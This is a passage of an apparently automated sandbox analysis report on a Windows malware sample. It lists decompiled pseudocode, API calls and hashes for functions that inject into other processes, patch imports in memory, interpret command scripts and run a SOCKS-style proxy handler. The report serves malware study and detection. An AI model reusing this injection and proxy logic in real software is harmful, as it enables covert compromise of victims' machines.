				intOrPtr _t9;

				if(_a12 == 0x64 || _a12 == 0x33) {
					EnterCriticalSection(0x41aa38);
					_t7 = E00412CBF(_a4);
					if(_t7 != 0xffffffff) {
						_t9 =  *0x41aa50; // 0x0
						_t7 = SetEvent( *(_t7 * 0x24 + _t9 + 4));
					}
					LeaveCriticalSection(0x41aa38);
					return _t7;
				}
				return _t6;
			}

0x004131fa
0x0041320b
0x00413215
0x0041321d
0x0041321f
0x0041322c
0x0041322c
0x00413233
0x00000000
0x0041323a
0x0041323b

APIs

EnterCriticalSection.KERNEL32(0041AA38), ref: 0041320B
SetEvent.KERNEL32(?), ref: 0041322C
LeaveCriticalSection.KERNEL32(0041AA38), ref: 00413233

Strings

3, xrefs: 004131FC

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: 3
API String ID: 3094578987-1842515611
Opcode ID: b4d6131e6587327dfd035e35e077c4b7f78641d3eaa56876753da921a7245954
Instruction ID: d3b77365b12bde46e7ed69af9c86c377a3a102a80826cfd8a8d565be135cedf8
Opcode Fuzzy Hash: b4d6131e6587327dfd035e35e077c4b7f78641d3eaa56876753da921a7245954
Instruction Fuzzy Hash: 34E06D35004100AFC3116B15AA488AABB64EEEA372704C57FF026A2170C73888A2CA1A

Uniqueness

Uniqueness Score: -1.00%

Function 00404B67, Relevance: 6.1, APIs: 4, Instructions: 127
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404B67(signed int __eax, void* __ecx, void* __edx, signed int _a4, char _a8) {
				void* _v8;
				intOrPtr _v12;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr* _t50;
				char _t52;
				char* _t55;
				signed int _t57;
				void* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				void* _t68;
				intOrPtr* _t69;
				void* _t71;
				intOrPtr _t73;
				intOrPtr _t74;
				intOrPtr _t78;
				void* _t79;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t90;

				_t68 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t57 = __eax;
				_t62 = 0;
				if(__eax <= 0) {
					L4:
					_t71 = VirtualAllocEx(0xffffffff, 0, _t57 * 0x23, 0x3000, 0x40);
					if(_t71 == 0) {
						L35:
						_t39 = 0;
						__eflags = 0;
						L36:
						L37:
						return _t39;
					}
					if(_a8 != 0) {
						ResetEvent( *0x419540);
					}
					_v8 = 0;
					if(_t57 <= 0) {
						L11:
						if(_v8 != _t57) {
							E00404ACF(_t57, _a4);
							__eflags = _a8;
							if(_a8 != 0) {
								SetEvent( *0x419540);
							}
							goto L35;
						}
						if(_t57 <= 0) {
							L30:
							if(_a8 != 0) {
								SetEvent( *0x419540);
							}
							_t39 = 1;
							goto L36;
						}
						_t69 = _a4;
						_a4 = _t57;
						do {
							_t16 = _t69 + 8; // 0xe8ec81f8
							_v12 =  *_t16;
							_v8 =  *_t69;
							_t46 =  *0x4192e4; // 0x400000
							_t19 = _t46 + 0x3c; // 0xe0
							_t65 =  *_t19 + _t46 + 0x80;
							_t78 =  *_t65;
							_t73 = _t46;
							if(_t78 <= 0 ||  *((intOrPtr*)(_t65 + 4)) <= 0x14) {
								L25:
								_t28 = _t69 + 8; // 0xe8ec81f8
								_t74 =  *_t28;
								_t66 =  *_t69;
								_t79 = 0;
								do {
									_t29 = _t79 + 0x4192f0; // 0x4192f0
									_t47 = _t29;
									if( *_t47 == _t66) {
										 *_t47 = _t74;
									}
									_t79 = _t79 + 4;
								} while (_t79 < 0x1c);
							} else {
								_t67 = _t78 + _t46;
								while(1) {
									_t48 =  *_t67;
									if(_t48 == 0) {
										goto L25;
									}
									_t80 = _t48 + _t73;
									_t50 =  *((intOrPtr*)(_t67 + 0x10)) + _t73;
									while(1) {
										__eflags =  *_t80;
										if( *_t80 == 0) {
											break;
										}
										__eflags = _v8 -  *_t50;
										if(_v8 ==  *_t50) {
											 *_t50 = _v12;
										}
										_t80 = _t80 + 4;
										_t50 = _t50 + 4;
										__eflags = _t50;
									}
									_t67 = _t67 + 0x14;
									__eflags = _t67;
								}
								goto L25;
							}
							_t69 = _t69 + 0x10;
							_t30 =  &_a4;
							 *_t30 = _a4 - 1;
						} while ( *_t30 != 0);
						goto L30;
					} else {
						_t82 = _a4 + 8;
						_t90 = _t82;
						while(1) {
							_t7 = _t82 - 4; // 0x91a00d83
							_t8 = _t82 - 8; // 0x774c084
							_t52 = E0040F207( *_t7, _t62, _t68, _t90,  *_t8, _t71);
							if(_t52 == 0) {
								goto L11;
							}
							 *_t82 = _t71;
							_t71 = _t71 + _t52;
							_v8 = _v8 + 1;
							 *((char*)(_t82 + 4)) = _t52;
							_t82 = _t82 + 0x10;
							if(_v8 < _t57) {
								continue;
							}
							goto L11;
						}
						goto L11;
					}
				}
				_t55 = _a4 + 0xc;
				while( *((intOrPtr*)(_t55 - 0xc)) != 0) {
					 *((intOrPtr*)(_t55 - 4)) = 0;
					 *_t55 = 0;
					_t62 = _t62 + 1;
					_t55 = _t55 + 0x10;
					if(_t62 < _t57) {
						continue;
					}
					goto L4;
				}
				_t39 = 0;
				goto L37;
			}

0x00404b67
0x00404b6a
0x00404b6b
0x00404b6e
0x00404b72
0x00404b76
0x00404b95
0x00404bac
0x00404bb0
0x00404cc5
0x00404cc5
0x00404cc5
0x00404cc7
0x00404cc8
0x00404ccb
0x00404ccb
0x00404bba
0x00404bc2
0x00404bc2
0x00404bc8
0x00404bcd
0x00404bf7
0x00404bfa
0x00404cae
0x00404cb3
0x00404cb7
0x00404cbf
0x00404cbf
0x00000000
0x00404cb7
0x00404c02
0x00404c93
0x00404c97
0x00404c9f
0x00404c9f
0x00404ca5
0x00000000
0x00404ca5
0x00404c08
0x00404c0b
0x00404c0e
0x00404c0e
0x00404c11
0x00404c16
0x00404c19
0x00404c1e
0x00404c21
0x00404c28
0x00404c2a
0x00404c2e
0x00404c6c
0x00404c6c
0x00404c6c
0x00404c6f
0x00404c71
0x00404c73
0x00404c73
0x00404c73
0x00404c7b
0x00404c7d
0x00404c7d
0x00404c7f
0x00404c82
0x00404c36
0x00404c36
0x00404c66
0x00404c66
0x00404c6a
0x00000000
0x00000000
0x00404c42
0x00404c48
0x00404c5e
0x00404c5e
0x00404c61
0x00000000
0x00000000
0x00404c4f
0x00404c51
0x00404c56
0x00404c56
0x00404c58
0x00404c5b
0x00404c5b
0x00404c5b
0x00404c63
0x00404c63
0x00404c63
0x00000000
0x00404c66
0x00404c87
0x00404c8a
0x00404c8a
0x00404c8a
0x00000000
0x00404bcf
0x00404bd2
0x00404bd2
0x00404bd5
0x00404bd5
0x00404bd9
0x00404bdc
0x00404be3
0x00000000
0x00000000
0x00404be5
0x00404be7
0x00404be9
0x00404bec
0x00404bef
0x00404bf5
0x00000000
0x00000000
0x00000000
0x00404bf5
0x00000000
0x00404bd5
0x00404bcd
0x00404b7b
0x00404b7e
0x00404b87
0x00404b8a
0x00404b8d
0x00404b8e
0x00404b93
0x00000000
0x00000000
0x00000000
0x00404b93
0x00404c3b
0x00000000

APIs

VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,?,?,00000000,?,?,?,00404DB0,00419020,00000001,00407798,00000000), ref: 00404BA6
ResetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404BC2
SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404C9F
SetEvent.KERNEL32(?,?,00000000,?,?,?,00404DB0,00419020), ref: 00404CBF

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Event$AllocResetVirtual
String ID:
API String ID: 4029583732-0
Opcode ID: a4595da3874a6bce4398495a5327fc9cb31f2deb7104b33838fa6823e895c3df
Instruction ID: 600be0b69083ccd930527d114a24bba1cc43f5838100a8772a9e597ba6594c99
Opcode Fuzzy Hash: a4595da3874a6bce4398495a5327fc9cb31f2deb7104b33838fa6823e895c3df
Instruction Fuzzy Hash: 3741D6B1905210EFEB21DF14C884A9E7BB5FB85314F1680BAEA55BB391D338ED41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00415520, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 86
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415520(void* __ebx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				WCHAR** _v28;
				void* __edi;
				intOrPtr _t35;
				intOrPtr* _t40;
				void* _t54;
				WCHAR** _t69;
				signed int _t73;

				_v8 = _v8 & 0x00000000;
				_t35 = E0040A0EC(E0040A3AA(__edx),  &_v24, __edx);
				_v20 = _t35;
				if(_t35 != 0xffffffff) {
					if(_t35 <= 0) {
						L21:
						E00409813(_v20, _v24);
						goto L22;
					}
					_v16 = _v16 & 0x00000000;
					_v12 = 1;
					do {
						_t40 = _v24 + _v16;
						if( *_t40 == 0) {
							goto L17;
						}
						_t71 =  *_t40;
						if( *((short*)( *_t40)) == 0) {
							goto L17;
						}
						_t54 = E0040A1B5(_t71, E0040A3AA(_t71),  &_v28);
						if(_t54 == 0xffffffff) {
							_v8 = "Not enough memory.";
							L20:
							goto L21;
						}
						_t69 = _v28;
						if(_t54 <= 0) {
							L16:
							E00409813(_t54, _t69);
							if(_v8 != 0) {
								goto L20;
							}
							goto L17;
						}
						_t73 = 0;
						while(lstrcmpiW( *_t69,  *(0x401ed0 + _t73 * 8)) != 0) {
							_t73 = _t73 + 1;
							if(_t73 < 0x18) {
								continue;
							}
							L14:
							if(_t73 == 0x18) {
								_v8 = "Unknown command at line %u.";
								 *_a4 = _v12;
							}
							goto L16;
						}
						if( *((intOrPtr*)(0x401ed4 + _t73 * 8))() == 0) {
							_v8 = "Failed to execute command at line %u.";
							 *_a4 = _v12;
						}
						goto L14;
						L17:
						_v16 = _v16 + 4;
						_v12 = _v12 + 1;
					} while (_v12 - 1 < _v20);
					goto L20;
				} else {
					_v8 = "Not enough memory.";
					L22:
					return _v8;
				}
			}

0x00415526
0x00415534
0x00415539
0x0041553f
0x00415550
0x00415618
0x0041561e
0x00000000
0x00415623
0x00415556
0x0041555b
0x00415563
0x00415569
0x0041556e
0x00000000
0x00000000
0x00415574
0x0041557a
0x00000000
0x00000000
0x0041558f
0x00415594
0x0041560f
0x00415616
0x00000000
0x00415617
0x00415596
0x0041559b
0x004155ec
0x004155ee
0x004155f7
0x00000000
0x00000000
0x00000000
0x004155f7
0x0041559d
0x0041559f
0x004155b2
0x004155b6
0x00000000
0x00000000
0x004155d8
0x004155db
0x004155e3
0x004155ea
0x004155ea
0x00000000
0x004155db
0x004155c7
0x004155cf
0x004155d6
0x004155d6
0x00000000
0x004155f9
0x004155f9
0x004155fd
0x00415604
0x00000000
0x00415541
0x00415541
0x00415624
0x00415628
0x00415628

APIs

lstrcmpiW.KERNEL32(?), ref: 004155A8

Strings

Not enough memory., xrefs: 00415541, 0041560F
Failed to execute command at line %u., xrefs: 004155CF
Unknown command at line %u., xrefs: 004155E3

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: Failed to execute command at line %u.$Not enough memory.$Unknown command at line %u.
API String ID: 1586166983-1498851671
Opcode ID: 30f14bd8a7a45581c2282d81f981393bcf47fba194e16d143c6612c58e65ee8e
Instruction ID: 9dc12722c77ddc691a7368cb8fdd39440c415d4a00dddf1b818b76ae52e57327
Opcode Fuzzy Hash: 30f14bd8a7a45581c2282d81f981393bcf47fba194e16d143c6612c58e65ee8e
Instruction Fuzzy Hash: 14319535A00618EBCF10EFA9C4846EEB7B6BF95314F50406AE411B7390D7789E81CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00407A4C, Relevance: 6.1, APIs: 4, Instructions: 86
injectionCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00407A4C(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
				char _v5;
				void _v12;
				void* _t23;
				void _t24;
				void _t39;
				void* _t49;
				void* _t50;

				_t50 = __esi;
				_t49 = __edi;
				_t23 =  *0x4192e4; // 0x400000
				_t24 = E0040F02D(_t23, __edi);
				_v12 = _t24;
				if(_t24 != 0) {
					_v5 = 0;
					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
						_v5 = 1;
					}
					_push(_t50);
					if(WriteProcessMemory(_t49, 0x4192d0 -  *0x4192e4 + _v12,  &_a8, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(WriteProcessMemory(_t49, 0x4192e4 -  *0x4192e4 + _v12,  &_v12, 4, 0) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00407378(0x419798, _t49, _v12,  *0x419798) == 0) {
						_v5 = _v5 + 1;
					}
					if(E00407378(0x41979c, _t49, _v12,  *0x41979c) == 0) {
						_v5 = _v5 + 1;
					}
					if(_v5 == 0) {
						_t39 = _v12;
					} else {
						VirtualFreeEx(_t49, _v12, 0, 0x8000);
						goto L1;
					}
				} else {
					L1:
					_t39 = 0;
				}
				return _t39;
			}

0x00407a4c
0x00407a4c
0x00407a51
0x00407a58
0x00407a5f
0x00407a64
0x00407a79
0x00407a86
0x00407a88
0x00407a88
0x00407a8c
0x00407ab0
0x00407ab2
0x00407ab2
0x00407ad3
0x00407ad5
0x00407ad5
0x00407aee
0x00407af0
0x00407af0
0x00407b09
0x00407b0b
0x00407b0b
0x00407b11
0x00407b28
0x00407b13
0x00407b1d
0x00000000
0x00407b1d
0x00407a66
0x00407a66
0x00407a66
0x00407a66
0x00407b2d

APIs

Part of subcall function 0040F02D: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 0040F049

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00413B94,?,00000000,?), ref: 00407A7E
WriteProcessMemory.KERNEL32(00000000,-00000014,?,00000004,00000000,?,?,?,?,00413B94,?,00000000,?,?,00413D20,?), ref: 00407AAC
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,00413B94,?,00000000,?,?,00413D20,?,?), ref: 00407ACE
VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,00413B94,?,00000000,?,?,00413D20), ref: 00407B1D

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
String ID:
API String ID: 2215616122-0
Opcode ID: 46dff849d72da35fab14edd5a96a290206f66e048153ea148a947f6979de9e9d
Instruction ID: 023d5390f456304c9f8919226834dc34827cf2621a248f917b1bf10a616807a2
Opcode Fuzzy Hash: 46dff849d72da35fab14edd5a96a290206f66e048153ea148a947f6979de9e9d
Instruction Fuzzy Hash: 7F21A671A08105BADF019BA49CD0EFE7F78DB09758F0440AAFA01B2291D3396E45DB29

Uniqueness

Uniqueness Score: -1.00%

Function 0041096F, Relevance: 6.1, APIs: 4, Instructions: 84
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041096F(signed int __edx, void** __esi, void* _a4, signed int _a8) {
				char _v5;
				long _v12;
				void _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t26;
				signed int _t29;
				signed int _t46;
				void** _t48;

				_t48 = __esi;
				_t46 = __edx;
				_v5 = 0;
				if(_a8 <= 0xa00000) {
					_t26 = E0040B135( *__esi);
					_v36 = _t26;
					_v32 = _t46;
					if((_t26 & _t46) != 0xffffffff && E0040B115( *__esi, 0, 0, 2) != 0) {
						_t29 = E0040B135( *__esi);
						_v28 = _t29;
						_v24 = _t46;
						if((_t29 & _t46) != 0xffffffff) {
							E004098AA( &_v20,  &_v20, 0, 5);
							_v20 = __esi[4] ^ _a8;
							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
								E0040B115( *_t48, _v28, _v24, 0);
								SetEndOfFile( *_t48);
							} else {
								_v5 = 1;
							}
						}
						FlushFileBuffers( *_t48);
						E0040B115( *_t48, _v36, _v32, 0);
					}
				}
				return _v5;
			}

0x0041096f
0x0041096f
0x00410980
0x00410983
0x0041098b
0x00410990
0x00410995
0x0041099b
0x004109b6
0x004109bb
0x004109c0
0x004109c6
0x004109cf
0x004109e1
0x004109f4
0x00410a26
0x00410a2d
0x00410a17
0x00410a17
0x00410a17
0x004109f4
0x00410a35
0x00410a44
0x00410a44
0x0041099b
0x00410a4f

APIs

Part of subcall function 0040B135: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 0040B14A

Part of subcall function 0040B115: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00410948,?,00000000,00000000,00000000,00000000), ref: 0040B127

WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 004109F0
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00410A09
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00410A2D
FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00410A35

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$BuffersFlush
String ID:
API String ID: 1289656144-0
Opcode ID: 136f62893871a8e3d77aff1e132577e63286b1fbbdba6dfae9b789199231357b
Instruction ID: deb2f6dbc83f18a79abbd262d1022ff78ecffaeb00a11f6f7a81fe5824f466e8
Opcode Fuzzy Hash: 136f62893871a8e3d77aff1e132577e63286b1fbbdba6dfae9b789199231357b
Instruction Fuzzy Hash: 04318F76800208EFDF11AFA4CC41EEEBBB9EF54384F14842AF190B61A1D37A8995DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCC2, Relevance: 6.0, APIs: 4, Instructions: 40
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DCC2(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t5;

				while(1) {
					_t5 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4bf);
					if(_t5 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						TranslateMessage( &_v28);
						DispatchMessageW( &_v28);
					}
				}
				return _t5;
			}

0x0040dd04
0x0040dd0d
0x0040dd11
0x00000000
0x00000000
0x0040dcf1
0x0040dce0
0x0040dceb
0x0040dceb
0x0040dcf1
0x0040dd1a

APIs

PeekMessageW.USER32 ref: 0040DCFA
MsgWaitForMultipleObjects.USER32 ref: 0040DD0D

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: c77ae905896d21d15b02800187d67b9768f7e1ee52069b6fec49a9d4a5287571
Instruction ID: 43c0066ee1c312274e20e06fb934691d564a2ac68e407947be14e7ff5a3b814f
Opcode Fuzzy Hash: c77ae905896d21d15b02800187d67b9768f7e1ee52069b6fec49a9d4a5287571
Instruction Fuzzy Hash: 6FF0BE7290420D7FE700AFE5DD88DA77BACFB893A4B05097EBA11E2060D639D8099775

Uniqueness

Uniqueness Score: -1.00%

Function 004157C7, Relevance: 6.0, APIs: 4, Instructions: 40
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004157C7(void* __eflags) {
				void* _t1;
				long _t6;
				void* _t12;

				_t1 = E00407A11(_t12, 0x19367400, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					if(E00407B3F() == 0) {
						L7:
						E0040DD1D(_t19);
						return 0;
					}
					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
					_t6 = WaitForSingleObject( *0x419798, 0x1388);
					while(_t6 == 0x102) {
						E00413BF3();
						_t6 = WaitForSingleObject( *0x419798, 0x1388);
					}
					goto L7;
				}
				return _t1 + 1;
			}

0x004157cf
0x004157d4
0x004157d8
0x004157e4
0x00415828
0x00415829
0x00000000
0x0041582e
0x004157f2
0x0041580a
0x00415821
0x00415813
0x0041581f
0x0041581f
0x00000000
0x00415827
0x00000000

APIs

Part of subcall function 00407A11: CreateMutexW.KERNEL32(0041930C,00000000,?,?,?,?,?), ref: 00407A32

GetCurrentThread.KERNEL32 ref: 004157EB
SetThreadPriority.KERNEL32(00000000,?,?,?,19367400,00000001), ref: 004157F2
WaitForSingleObject.KERNEL32(00001388,?,?,?,19367400,00000001), ref: 0041580A

Memory Dump Source

Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Yara matches

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 3c4bc1fcba093463ca7ec7a7ff2f1f42970421972e355cbde7b6ede548dc43cc
Instruction ID: 7053b9dcba28187c44e90bcd02408608f403a4c97a74a96f377c2366faff531a
Opcode Fuzzy Hash: 3c4bc1fcba093463ca7ec7a7ff2f1f42970421972e355cbde7b6ede548dc43cc
Instruction Fuzzy Hash: 29F05931914208EED6003BA1AC44DEB3A0EDB943A8B200037F511A21A2D9384CD286BA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D89E, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D89E(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t102;
				char* _t104;
				signed int _t114;
				void* _t124;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t109 = _a4;
				_t59 = E0040CDF1(_t109);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E0040C7D0(_t61, _t109) != 0) {
					while(E0040C7D0(1, _t109,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t114 = _v29;
							_t115 = _t114 << 0x10;
							_v13 = 0x5a;
							if(((_t114 & 0x00ff0000 | _t114 >> 0x00000010) >> 0x00000008 | (_t114 & 0x0000ff00 | _t114 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E0040D828(_t109, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E004098AA( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E0040C867( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E0040CC2C(_t115, _t127);
									_t84 = E0040D828(_t109, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0040CA62(_t109);
									}
									E0040CBD4(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E0040C961( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t124 = E0040D828(_t109, _t129, 0x5a, _v24);
									if(_t124 != 1) {
										L31:
										E0040CBD4(_t89, _t129);
										if(_t124 == 0xffffffff) {
											goto L23;
										}
										if(_t124 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E0040CBA9( &_a4);
									_v36 = _t126;
									E0040CBD4(_t92, _v20);
									if(_t126 != 0xffffffff) {
										E0040CC2C(_t115, _t126);
										_t109 = _a4;
										_t124 = E0040D828(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t124 == 1) {
											_push(_v36);
											_t89 = E0040CA62(_t109);
										}
										_t129 = _v36;
										goto L31;
									}
									_t109 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t115 = _t109;
								if(E0040C7D0(1, _t109,  &_v9, 0) == 0) {
									goto L1;
								}
								_t102 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t102;
								if(_t102 == 0) {
									_t104 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t104, 0, 0,  &_v20);
									if(_t104 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E00409833( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x0040d8a8
0x0040d8ae
0x0040d8be
0x0040d8c2
0x0040d8c5
0x0040d8c6
0x0040d8d2
0x0040d8e1
0x0040d8df
0x0040d8f6
0x0040d90f
0x0040d91d
0x0040d926
0x0040d9b0
0x0040d9b4
0x0040d9b8
0x0040dae5
0x00000000
0x0040daf5
0x0040d9c5
0x0040d9cc
0x0040d9cd
0x0040d9d5
0x0040d9d6
0x0040da89
0x0040da93
0x0040da9b
0x0040daa0
0x0040d9df
0x0040d9df
0x00000000
0x0040d9df
0x0040daa7
0x0040dab3
0x0040dabb
0x0040dac8
0x0040dad0
0x0040daca
0x0040daca
0x0040daca
0x0040dabd
0x0040dabd
0x0040dabe
0x0040dabe
0x0040dad4
0x0040dadd
0x0040da7b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040dadd
0x0040d9dd
0x0040d9f2
0x0040d9f4
0x0040d9fa
0x00000000
0x00000000
0x0040da08
0x0040da0d
0x0040da64
0x0040da64
0x0040da6c
0x00000000
0x00000000
0x0040da75
0x0040da77
0x0040da77
0x00000000
0x0040da75
0x0040da1e
0x0040da20
0x0040da23
0x0040da2b
0x0040da3a
0x0040da42
0x0040da52
0x0040da57
0x0040da59
0x0040da5c
0x0040da5c
0x0040da61
0x00000000
0x0040da61
0x0040da2d
0x0040da30
0x00000000
0x0040da30
0x00000000
0x0040d9dd
0x0040d92c
0x0040d92e
0x0040d936
0x0040d93f
0x00000000
0x00000000
0x0040d941
0x0040d944
0x0040d94d
0x0040d963
0x0040d96a
0x0040d96d
0x0040d975
